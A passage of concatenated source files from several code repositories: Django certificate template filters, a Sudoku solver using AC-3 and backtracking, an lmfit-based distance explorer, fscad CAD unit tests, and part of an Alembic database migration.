"""Add the required attribute to an input element."""
html = str(value)
if html and html.startswith('<input '):
html = html.replace('<input ', '<input required ')
return SafeText(html)
@register.filter
def approval(value):
"""Return the approval status of a request."""
if value is None:
return 'Pending'
if value:
return 'Approved'
return 'Denied'
@register.filter
def valid_for(days):
"""Return a text saying for how many days
the certificate is valid for or years if it spans over years."""
delta = timedelta(days=days)
value = ''
if delta.days / 365 > 1:
value += '%d years' % (delta.days / 365)
else:
value += '%d days' % delta.days
return value
@register.filter
def valid_until(days):
"""Return a date that is `days` in the future."""
future = timezone.now() + timedelta(days=days)
return future
@register.filter
def status(cert):
"""Return a string with the status of the certificate."""
value = 'Valid'
if cert.is_revoked:
value = 'Revoked'
elif cert.is_expired:
value = 'Expired'
return value
@register.filter
def subject(x509):
"""Return the subject of the certificate."""
value = components_to_name(x509.get_subject().get_components())
return subject_display(value).replace('/', ' ').strip()
```
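Since the filters are plain functions, they can also be exercised directly; a couple of illustrative calls (the import path is an assumption about the project layout):

```python
from webca.web.templatetags.webca import approval, valid_for  # assumed path

assert valid_for(30) == '30 days'    # under a year -> days
assert valid_for(730) == '2 years'   # spans multiple years -> whole years
assert approval(None) == 'Pending'
assert approval(True) == 'Approved'
assert approval(False) == 'Denied'
```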
|
{
"source": "Jesusfreakster1/Python-AC3-Backtracking-CSP-Sudoku-Solver",
"score": 4
}
|
#### File: Jesusfreakster1/Python-AC3-Backtracking-CSP-Sudoku-Solver/backtrack.py
```python
from Utility import selectMostConstrainedVariable, orderDomainValues, isConsistent, assign, unassign
#Supposes assignments, and then backtracks and tries again through the possibilities
#Uses recursion to test all possibilities until a solution is found or all possibilities have been tried and none exists
def backtrackRecursion(assignment, sudoku):
#If the assignment is the same size as the sudoku, we know we have solved it and can return the result
if len(assignment) == len(sudoku.cells):
return assignment
#Decide what variable to work with (MRV)
cell = selectMostConstrainedVariable(assignment, sudoku)
    #Pick an assignment that causes the least conflicts...
for value in orderDomainValues(sudoku, cell):
#...If there are no conflicts with this assignment, then...
if isConsistent(sudoku, assignment, cell, value):
#...Add this assignment supposition to our proposed solution...
assign(sudoku, cell, value, assignment)
            #...and keep going until we find a solution.
result = backtrackRecursion(assignment, sudoku)
#...If continuing forward finds a solution, we return the assignment of that solution
if result:
return result
#...If we find the current assignment does conflict with something, we undo it and try to pick another
unassign(sudoku, cell, assignment)
#If we made it here, that means we...
    #-went through all possible values for the current cell
#-continued through the algorithm to the end of all the possibilities of every cell from then on by calling recursively
    #-and STILL couldn't find a solution, therefore it doesn't exist, so return failure
return False
```
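The select / assign / recurse / unassign pattern above is the classic CSP backtracking loop. Below is a self-contained toy version on a three-variable map-colouring problem; the helpers are stand-ins for illustration, not the real Utility functions:

```python
# Toy CSP: colour three mutually adjacent regions so that neighbours differ.
ADJACENT = {('A', 'B'), ('B', 'C'), ('A', 'C')}

def conflicts(var, value, assignment):
    """True if giving `var` this value clashes with an already assigned neighbour."""
    neighbours = {b if a == var else a for a, b in ADJACENT if var in (a, b)}
    return any(assignment.get(n) == value for n in neighbours)

def backtrack(assignment, variables, domains):
    if len(assignment) == len(variables):          # every variable assigned -> solved
        return assignment
    var = next(v for v in variables if v not in assignment)
    for value in domains[var]:
        if not conflicts(var, value, assignment):
            assignment[var] = value                # suppose this value...
            result = backtrack(assignment, variables, domains)
            if result:
                return result
            del assignment[var]                    # ...and undo it if it leads nowhere
    return False

print(backtrack({}, 'ABC', {v: ['red', 'green', 'blue'] for v in 'ABC'}))
# -> {'A': 'red', 'B': 'green', 'C': 'blue'}
```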
#### File: Jesusfreakster1/Python-AC3-Backtracking-CSP-Sudoku-Solver/Sudoku_solver.py
```python
import sys
from AC3 import AC3, removeInconsistentValues
from backtrack import backtrackRecursion
import Utility
import re
import itertools
rows = "123456789"
cols = "ABCDEFGHI"
#Set up the Sudoku grid from the string
class Sudoku:
def __init__(self, grid):
game = list(grid)
#Generates all the coordinates to designate each cell in the grid
self.cells = list()
self.cells = self.generateCoords()
        #Creates the possibilities 1-9 for every cell, unless it's already been given
self.possibilities = dict()
self.possibilities = self.generatePossibilities(grid)
#Generates the constraints for rows, columns, and 3x3 subgrids
ruleConstraints = self.generateRulesConstraints()
        #Takes the above constraints and creates the binary relations between cells as nodes
self.binaryConstraints = list()
self.binaryConstraints = self.GenerateBinaryConstraints(ruleConstraints)
#Generates the relationship between each node
self.relatedCells = dict()
self.relatedCells = self.generateRelatedCells()
#Generates the list of values that have been pruned out by forward checking
self.pruned = dict()
self.pruned = {v: list() if grid[i] == '0' else [int(grid[i])] for i, v in enumerate(self.cells)}
    #Generates the coordinate grid for all the cells
def generateCoords(self):
allCellsCoords = []
#for A,B,C, ... ,H,I
for col in cols:
#for 1,2,3 ,... ,8,9
for row in rows:
#A1, A2, A3, ... , H8, H9
newCoords = col + row
allCellsCoords.append(newCoords)
return allCellsCoords
    #Generates the possibilities 1-9 for undetermined cells and slots the given values for given cells at the start
def generatePossibilities(self, grid):
gridList = list(grid)
possibilities = dict()
for index, coords in enumerate(self.cells):
#if value is 0, then the cell can have any value in [1, 9]
if gridList[index] == "0":
possibilities[coords] = list(range(1, 10))
#else value is already defined, possibilities is this value
else:
possibilities[coords] = [int(gridList[index])]
return possibilities
#Makes constraints based upon the rules of Sudoku
def generateRulesConstraints(self):
rowConstraints = []
columnConstraints = []
squareConstraints = []
#Rows constraints
for row in rows:
rowConstraints.append([col + row for col in cols])
#Columns constraints
for col in cols:
columnConstraints.append([col + row for row in rows])
#3x3 square constraints
rowsSquareCoords = (cols[i:i + 3] for i in range(0, len(rows), 3))
rowsSquareCoords = list(rowsSquareCoords)
colsSquareCoords = (rows[i:i + 3] for i in range(0, len(cols), 3))
colsSquareCoords = list(colsSquareCoords)
#Apply the constraints to each cell...
for row in rowsSquareCoords:
for col in colsSquareCoords:
currentSquareConstraints = []
#...And each value in it
for x in row:
for y in col:
currentSquareConstraints.append(x + y)
squareConstraints.append(currentSquareConstraints)
#All of the constraints is the sum of the three rules
return rowConstraints + columnConstraints + squareConstraints
#Creates the binary constraints from the rule constraints
def GenerateBinaryConstraints(self, ruleConstraints):
generatedBinaryConstraints = list()
#Create binary constraints for each set of constraints based on the rules
for constraintSet in ruleConstraints:
binaryConstraints = list()
#2 because we want binary constraints
for binaryConstraint in itertools.permutations(constraintSet, 2):
binaryConstraints.append(binaryConstraint)
#For every binary constraint...
for constraint in binaryConstraints:
#Make sure it is unique/doesn't already exist
constraintList = list(constraint)
if (constraintList not in generatedBinaryConstraints):
generatedBinaryConstraints.append([constraint[0], constraint[1]])
return generatedBinaryConstraints
    #Determines which cells are related to one another
def generateRelatedCells(self):
relatedCells = dict()
#for each one of the 81 cells
for cell in self.cells:
relatedCells[cell] = list()
#related cells are the ones that current cell has constraints with
for constraint in self.binaryConstraints:
if cell == constraint[0]:
relatedCells[cell].append(constraint[1])
return relatedCells
#Determines if the Sudoku is solved or not by iterating through each cell and making sure there is only one possibility for it
def isFinished(self):
for coords, possibilities in self.possibilities.items():
if len(possibilities) > 1:
return False
return True
    #Generates an easy to read string based on a Sudoku
def __str__(self):
output = ""
count = 1
#For each cell...
for cell in self.cells:
#...Print its value
value = str(self.possibilities[cell])
if type(self.possibilities[cell]) == list:
value = str(self.possibilities[cell][0])
output += "[" + value + "]"
#Makes a newline at the end of a row
if count >= 9:
count = 0
output += "\n"
count += 1
return output
#Solves a Sudoku via AC3 and returns true if complete, and false if impossible
def solveAC3(grid):
print("AC3 starting")
#Make the Sudoku based on the provided input grid
sudoku = Sudoku(grid)
#Launch AC-3 algorithm of the Sudoku
AC3SolutionExists = AC3(sudoku)
#Sudoku has no solution
if not AC3SolutionExists:
print("this Sudoku has no solution")
else:
#If AC3 worked print the solution
if sudoku.isFinished():
print("Solution complete.")
print("Result: \n{}".format(sudoku))
#If AC3 didn't work, we need to backtrack
else:
print("Backtracking to find solution...")
assignment = {}
#Set the values we already know
for cell in sudoku.cells:
if len(sudoku.possibilities[cell]) == 1:
assignment[cell] = sudoku.possibilities[cell][0]
            #Then start backtracking
assignment = backtrackRecursion(assignment, sudoku)
            if assignment:
                #merge the computed values for the cells at one place
                for cell in sudoku.possibilities:
                    sudoku.possibilities[cell] = assignment[cell] if len(sudoku.possibilities[cell]) > 1 else sudoku.possibilities[cell]
                print("Result: \n{}".format(sudoku))
            else:
                print("No solution exists")
if __name__ == "__main__":
selection = 0
selection = int(input("Please input a 1 to input the Sudoku manually, or input a 2 to read it from a .txt file\n"))
sudoku = ""
while selection != 1 and selection != 2:
selection = int(input("Input not recognized, please input a 1 or a 2\n"))
if selection == 1:
sudoku = str(input("Type the Sudoku as a 81 character string that goes across each row, use a 0 as a blank cell\n"))
if len(sudoku) != 81 or not sudoku.isdecimal():
print("Sudoku is of improper form, exiting")
exit(1)
if selection == 2:
filename = str(input("Type the filename without the file extension\n"))
filename = filename + ".txt"
file = open(filename, "r")
with open(filename, "r") as file:
while True:
fileChar = file.read()
sudoku = sudoku + fileChar
if fileChar == '':
#Debug: print("EOF")
break
#Debug: print(sudoku)
sudoku = sudoku.replace(" ", "")
sudoku = sudoku.replace('\n', "")
sudoku = sudoku.replace('\r', "")
sudoku = sudoku.replace('\r\n', "")
sudoku = sudoku.replace(',', "")
sudoku = sudoku.replace('[', "")
sudoku = sudoku.replace(']', "")
#Debug: print(sudoku)
if len(sudoku) != 81 or not sudoku.isdecimal():
print("Sudoku is of improper form, exiting")
exit(1)
selection = int(input("Please input a 1 to solve via AC3, or input a 2 to solve via forward checking\n"))
while selection != 1 and selection != 2:
selection = int(input("Input not recognized, please input a 1 or a 2\n"))
if selection == 1:
solveAC3(sudoku)
if selection == 2:
solveForwardChecking(sudoku)
```
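As a quick non-interactive smoke test, solveAC3 can be driven with an 81-character grid string directly; an all-zero string is the simplest valid input (AC-3 cannot reduce a blank grid, so the backtracking phase does all the work):

```python
from Sudoku_solver import solveAC3  # assumed module name

solveAC3("0" * 81)  # blank puzzle: every cell starts with domain 1-9
```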
|
{
"source": "JesusFreke/edist",
"score": 3
}
|
#### File: JesusFreke/edist/explorer.py
```python
import lmfit
import numpy
class TooManyIterationsException(Exception):
pass
class Explorer(object):
"""This class tries to "explore" the local minima of the error function.
The error function is the sum of square of distance errors for known distances.
    Given an initial location near a local minimum, it will attempt to descend to the minimum, and then evaluate all
    points on a grid of a fixed size (currently hard-coded to 1/32) in and around that local minimum.
    """
"""
def __init__(self, connections, limit):
self.values = {}
self.connections = connections
self.correct_locations = []
self.limit = limit
def explore(self, location):
"""Explore the local minima near location.
This calculates the error function for all grid-aligned locations in and around the volume where error=0.
Afterwards, the correct_locations field will be populated with all the grid-aligned locations where error=0.
Raises:
TooManyIterationsException: if more than [limit] (from the constructor) locations are calculated
"""
self.generic_explore(location,
lambda location: self.explore_plane(location),
lambda params: self.objective(params),
3,
False)
def minimize(self, initial_guess, objective, dimensions):
params = lmfit.Parameters()
params.add('x', value=initial_guess[0], vary=True)
params.add('y', value=initial_guess[1], vary=False)
params.add('z', value=initial_guess[2], vary=False)
if dimensions > 1:
params['y'].vary = True
if dimensions > 2:
params['z'].vary = True
estimation = lmfit.minimize(objective, params)
if estimation.success:
return numpy.array([estimation.params['x'].value,
estimation.params['y'].value,
estimation.params['z'].value])
return None
def objective(self, params, x=None, y=None, z=None):
"""An objective function for use with lmfit's minimize function."""
if x is None:
x = params['x'].value
if y is None:
y = params['y'].value
if z is None:
z = params['z'].value
guess = numpy.array([x, y, z])
error = []
for name, other_location, expected_distance in self.connections:
error.append(self.calculate_single_error(guess, other_location, expected_distance) ** 2)
return error
def generic_explore(self, location, explore_func, objective_func, dimensions, exit_early=True):
if self.get_error(location) != 0:
minimum_location = self.minimize(location, objective_func, dimensions)
minimum_value = self.get_error(minimum_location)
if minimum_value > .001 and exit_early:
return False
else:
minimum_location = location
initial_location = numpy.rint(minimum_location * 32) / 32
next_location = initial_location
explore_func(next_location)
vector = numpy.array([0, 0, 0], float)
vector[dimensions-1] = 1/32.0
next_location = next_location + vector
while explore_func(next_location):
next_location = next_location + vector
next_location = initial_location - vector
while explore_func(next_location):
next_location = next_location - vector
return True
def explore_line(self, location):
return self.generic_explore(location,
lambda location: self.get_error(location) < .0001,
lambda params: self.objective(params, y=location[1], z=location[2]),
1)
def explore_plane(self, location):
return self.generic_explore(location,
lambda location: self.explore_line(location),
lambda params: self.objective(params, z=location[2]),
2)
def get_error(self, location):
"""Gets the error value at the given location."""
location_tuple = tuple(location)
value = self.values.get(location_tuple)
if value is not None:
return value
else:
value = self.calculate_error(location)
self.values[location_tuple] = value
if len(self.values) > self.limit:
raise TooManyIterationsException()
return value
def calculate_single_error(self, location, other_location, expected_distance):
"""Calculates the raw error for a single known distance."""
# First, calculate the distance using 32-bit floats, to match the calculation used by the game
float32_distance = numpy.linalg.norm((location - other_location).astype(numpy.float32))
if round(float32_distance, 2) == expected_distance:
return 0
# Now, recalculate the distance using 64-bit floats to get a smoother function, which
# works better with lmfit's minimizer
actual_distance = numpy.linalg.norm(location - other_location)
return actual_distance - expected_distance
def calculate_error(self, location):
"""Calculates the square of the distance errors for the given location."""
error = 0
for (name, other_location, expected_distance) in self.connections:
error += self.calculate_single_error(location, other_location, expected_distance) ** 2
# This shouldn't get called for the same location twice, since we're memoizing the results in Explorer.get_error
if error == 0 and is_grid_aligned(location):
self.correct_locations.append(location)
return error
def is_grid_aligned(location):
return numpy.array_equal(location, numpy.rint(location * 32) / 32)
```
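A hedged usage sketch: each connection is a (name, location, expected_distance) tuple, with distances rounded to two decimals the way the class expects. The reference coordinates below are made up so that (10, 0, 0) satisfies all four distances exactly, and the module name is an assumption:

```python
import numpy

from explorer import Explorer, TooManyIterationsException  # assumed module name

connections = [
    ("Ref A", numpy.array([0.0, 0.0, 0.0]), 10.0),
    ("Ref B", numpy.array([20.0, 0.0, 0.0]), 10.0),
    ("Ref C", numpy.array([10.0, 15.0, 0.0]), 15.0),
    ("Ref D", numpy.array([10.0, 0.0, 12.0]), 12.0),
]

explorer = Explorer(connections, limit=200000)
try:
    explorer.explore(numpy.array([10.0, 0.0, 0.0]))  # start near the expected position
    for location in explorer.correct_locations:
        print(location)
except TooManyIterationsException:
    print("zero-error region too large for the configured limit")
```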
|
{
"source": "JesusFreke/fscad",
"score": 2
}
|
#### File: fscad/tests/fillet_chamfer_test.py
```python
import adsk.fusion
from adsk.core import Vector3D
import math
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class FilletChamferTest(FscadTestCase):
def test_basic_fillet(self):
box = Box(1, 1, 1)
fillet = Fillet(box.shared_edges(box.front, box.left), .25)
fillet.create_occurrence(True)
def test_two_edge_fillet(self):
box = Box(1, 1, 1)
fillet = Fillet(box.shared_edges(box.front, [box.left, box.right]), .25)
fillet.create_occurrence(True)
def test_two_body_fillet(self):
rect = Rect(1, 1)
rect2 = rect.copy()
rect2.tx(2)
extrude = Extrude(Union(rect, rect2), 1)
fillet = Fillet(extrude.shared_edges(extrude.end_faces, extrude.side_faces), .25)
fillet.create_occurrence(True)
def test_smooth_fillet(self):
box = Box(1, 1, 1)
fillet = Fillet(box.shared_edges([box.front, box.top, box.left], [box.front, box.top, box.left]), .25, True)
fillet.create_occurrence(True)
def test_basic_chamfer(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.front, box.left), .25)
chamfer.create_occurrence(True)
def test_two_edge_chamfer(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.front, [box.left, box.right]), .25)
chamfer.create_occurrence(True)
def test_two_body_chamfer(self):
rect = Rect(1, 1)
rect2 = rect.copy()
rect2.tx(2)
extrude = Extrude(Union(rect, rect2), 1)
chamfer = Chamfer(extrude.shared_edges(extrude.end_faces, extrude.side_faces), .25)
chamfer.create_occurrence(True)
def test_uneven_chamfer(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.front, box.left), .25, .5)
chamfer.create_occurrence(True)
def test_chamfered_faces(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.top, [box.left, box.right, box.front, box.back]), .25)
chamfer.create_occurrence(True)
self.assertEqual(len(chamfer.chamfered_faces), 4)
for face in chamfer.chamfered_faces:
self.assertEqual(
math.degrees(face.get_plane().normal.angleTo(Vector3D.create(0, 0, 1))),
45)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__])
unittest.TextTestRunner(failfast=True).run(test_suite)
```
#### File: fscad/tests/loft_test.py
```python
import adsk.fusion
import math
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class LoftTest(FscadTestCase):
def test_basic_loft(self):
rect = Rect(1, 1)
circle = Circle(1)
circle.place(~circle == ~rect,
~circle == ~rect,
(~circle == ~rect) + 1)
loft = Loft(rect, circle)
loft.create_occurrence(True)
self.assertEqual(loft.bottom.brep.pointOnFace.z, 0)
self.assertTrue(math.isclose(loft.top.brep.pointOnFace.z, 1))
self.assertEqual(len(list(loft.sides)), 4)
def test_loft_with_hole(self):
outer = Circle(2, "outer")
inner = Circle(1, "inner")
bottom = Difference(outer, inner, name="bottom")
outer2 = Circle(1, "outer2")
inner2 = Circle(.5, "inner2")
top = Difference(outer2, inner2)
top.place(~top == ~bottom,
~top == ~bottom,
(~top == ~bottom) + 1)
loft = Loft(bottom, top)
loft.create_occurrence(True)
self.assertEqual(loft.bottom.brep.pointOnFace.z, 0)
self.assertEqual(loft.top.brep.pointOnFace.z, 1)
self.assertEqual(len(list(loft.sides)), 1)
def test_triple_loft(self):
rect1 = Rect(1, 1, "rect1")
circle = Circle(1)
circle.place(~circle == ~rect1,
~circle == ~rect1,
(~circle == ~rect1) + 1)
rect2 = Rect(1, 1, "rect2")
rect2.place(~rect2 == ~circle,
~rect2 == ~circle,
(~rect2 == ~circle) + 1)
loft = Loft(rect1, circle, rect2)
loft.create_occurrence(True)
self.assertEqual(loft.bottom.brep.pointOnFace.z, 0)
self.assertEqual(loft.top.brep.pointOnFace.z, 2)
self.assertEqual(len(list(loft.sides)), 4)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__])
unittest.TextTestRunner(failfast=True).run(test_suite)
```
#### File: fscad/tests/silhouette_test.py
```python
import adsk.fusion
from adsk.core import Point3D, Vector3D
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class SilhouetteTest(FscadTestCase):
def test_orthogonal_face_silhouette(self):
rect = Rect(1, 1)
silhouette = Silhouette(rect.faces[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), rect.size().asArray())
def test_non_orthogonal_face_silhouette(self):
rect = Rect(1, 1)
rect.ry(45)
silhouette = Silhouette(rect.faces[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (rect.size().x, rect.size().y, 0))
def test_parallel_face_silhouette(self):
rect = Rect(1, 1)
rect.ry(90)
silhouette = Silhouette(rect.faces[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (0, 0, 0))
def test_body_silhouette(self):
box = Box(1, 1, 1)
box.ry(45)
silhouette = Silhouette(box.bodies[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (box.size().x, box.size().y, 0))
def test_component_silhouette(self):
rect = Rect(1, 1)
rect.ry(45)
silhouette = Silhouette(rect, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (rect.size().x, rect.size().y, 0))
def test_multiple_disjoint_faces_silhouette(self):
rect1 = Rect(1, 1)
rect2 = Rect(1, 1)
rect2.ry(45)
rect2.tx(2)
assembly = Group([rect1, rect2])
silhouette = Silhouette(assembly.faces, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertTrue(abs(silhouette.size().x - assembly.size().x) < app().pointTolerance)
self.assertTrue(abs(silhouette.size().y - assembly.size().y) < app().pointTolerance)
self.assertEquals(silhouette.size().z, 0)
def test_multiple_overlapping_faces_silhouette(self):
rect1 = Rect(1, 1)
rect2 = Rect(1, 1)
rect2.ry(45)
rect2.translate(.5, .5)
assembly = Group([rect1, rect2])
silhouette = Silhouette(assembly.faces, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertTrue(abs(silhouette.size().x - assembly.size().x) < app().pointTolerance)
self.assertTrue(abs(silhouette.size().y - assembly.size().y) < app().pointTolerance)
self.assertEquals(silhouette.size().z, 0)
def test_cylinder_silhouette(self):
cyl = Cylinder(1, 1)
silhouette = Silhouette(cyl, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (cyl.size().x, cyl.size().y, 0))
def test_single_edge(self):
circle = Circle(1)
silhouette = Silhouette(circle.edges[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), circle.size().asArray())
def test_multiple_edges(self):
rect = Rect(1, 1)
hole1 = Circle(.1)
hole2 = Circle(.2)
hole1.place(
(-hole1 == -rect) + .1,
(-hole1 == -rect) + .1,
~hole1 == ~rect)
hole2.place(
(+hole2 == +rect) - .1,
(+hole2 == +rect) - .1,
~hole2 == ~rect)
assembly = Difference(rect, hole1, hole2)
silhouette = Silhouette(assembly.faces[0].outer_edges, assembly.get_plane())
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), rect.size().asArray())
self.assertEquals(len(silhouette.edges), 4)
def test_named_edges(self):
box = Box(1, 1, 1)
silhouette = Silhouette(
box,
adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)),
named_edges={
"front": box.shared_edges(box.bottom, box.front),
"back": box.shared_edges(box.bottom, box.back),
"left": box.shared_edges(box.bottom, box.left),
"right": box.shared_edges(box.bottom, box.right)})
silhouette.create_occurrence(create_children=True)
edge_finder = Box(.1, .1, .1)
edge_finder.place(
~edge_finder == ~silhouette,
-edge_finder == -silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("front")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
edge_finder.place(
~edge_finder == ~silhouette,
+edge_finder == +silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("back")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
edge_finder.place(
+edge_finder == +silhouette,
~edge_finder == ~silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("right")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
edge_finder.place(
-edge_finder == -silhouette,
~edge_finder == ~silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("left")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__],
#pattern="named_edges",
)
unittest.TextTestRunner(failfast=True).run(test_suite)
```
#### File: fscad/tests/split_face_test.py
```python
import adsk.fusion
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class SplitFaceTest(FscadTestCase):
def test_basic_split_face(self):
box = Box(1, 1, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box,
~cylinder == ~box,
-cylinder == +box)
split = SplitFace(box, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
def test_basic_split_face_direct(self):
box = Box(1, 1, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box,
~cylinder == ~box,
-cylinder == +box)
split = SplitFace(box, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
def test_multiple_lump_split_face(self):
box1 = Box(1, 1, 1, "box1")
box2 = Box(1, 1, 1, "box2")
box2.place((-box2 == +box1) + 1)
union = Union(box1, box2)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box1,
~cylinder == ~box1,
-cylinder == +box1)
split = SplitFace(union, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
self.assertLess(split.split_faces[0].brep.pointOnFace.x, 1)
def test_multiple_body_split_face(self):
rect1 = Rect(1, 1, "rect1")
rect2 = Rect(1, 1, "rect2")
rect2.place((-rect2 == +rect1) + 1)
union = Union(rect1, rect2)
extrude = Extrude(union, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~rect1,
~cylinder == ~rect1,
(-cylinder == +rect1)+1)
split = SplitFace(extrude, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
self.assertLess(split.split_faces[0].brep.pointOnFace.x, 1)
def test_split_face_with_face(self):
box1 = Box(1, 1, 1)
box2 = Box(1, 1, 1)
box2.place((-box2 == +box1) + 1)
union = Union(box1, box2)
cylinder = Cylinder(1, .25).ry(90)
cylinder.place(-cylinder == +box1,
~cylinder == ~box1,
~cylinder == ~box1)
split = SplitFace(union, cylinder.bottom)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.x, 1)
self.assertEqual(split.split_faces[0].size().asArray(), (0, .5, .5))
def test_split_face_with_non_coincident_body(self):
box = Box(1, 1, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box,
~cylinder == ~box,
~cylinder == +box)
split = SplitFace(box, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__],
#pattern="multiple_body_split_face",
)
unittest.TextTestRunner(failfast=True).run(test_suite)
```
|
{
"source": "jesushl/alembic_example",
"score": 2
}
|
#### File: alembic/versions/a118749841ec_fixing_typos.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "e97146c004ec"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index("ix_country_id", table_name="country")
op.drop_table("country")
op.drop_index("ix_anual_earning_id", table_name="anual_earning")
op.drop_table("anual_earning")
op.drop_index("ix_quarterly_earning_id", table_name="quarterly_earning")
op.drop_table("quarterly_earning")
op.drop_index("ix_sector_id", table_name="sector")
op.drop_table("sector")
op.drop_index("ix_company_id", table_name="company")
op.drop_table("company")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"company",
sa.Column(
"id",
sa.INTEGER(),
server_default=sa.text("nextval('company_id_seq'::regclass)"),
autoincrement=True,
nullable=False,
),
sa.Column("symbol", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column("description", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column("country_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column("sector_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(
["country_id"], ["country.id"], name="company_country_id_fkey"
),
sa.ForeignKeyConstraint(
["sector_id"], ["sector.id"], name="company_sector_id_fkey"
),
sa.PrimaryKeyConstraint("id", name="company_pkey"),
sa.UniqueConstraint("symbol", name="company_symbol_key"),
postgresql_ignore_search_path=False,
)
op.create_index("ix_company_id", "company", ["id"], unique=False)
op.create_table(
"sector",
sa.Column(
"id",
sa.INTEGER(),
server_default=sa.text("nextval('sector_id_seq'::regclass)"),
autoincrement=True,
nullable=False,
),
sa.Column("name", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.PrimaryKeyConstraint("id", name="sector_pkey"),
sa.UniqueConstraint("name", name="sector_name_key"),
postgresql_ignore_search_path=False,
)
op.create_index("ix_sector_id", "sector", ["id"], unique=False)
op.create_table(
"quarterly_earning",
sa.Column("id", sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column("fiscal_date_ending", sa.DATE(), autoincrement=False, nullable=True),
sa.Column(
"reported_eps",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column(
"estimated_eps",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column(
"surprise",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column(
"surprise_percentage",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
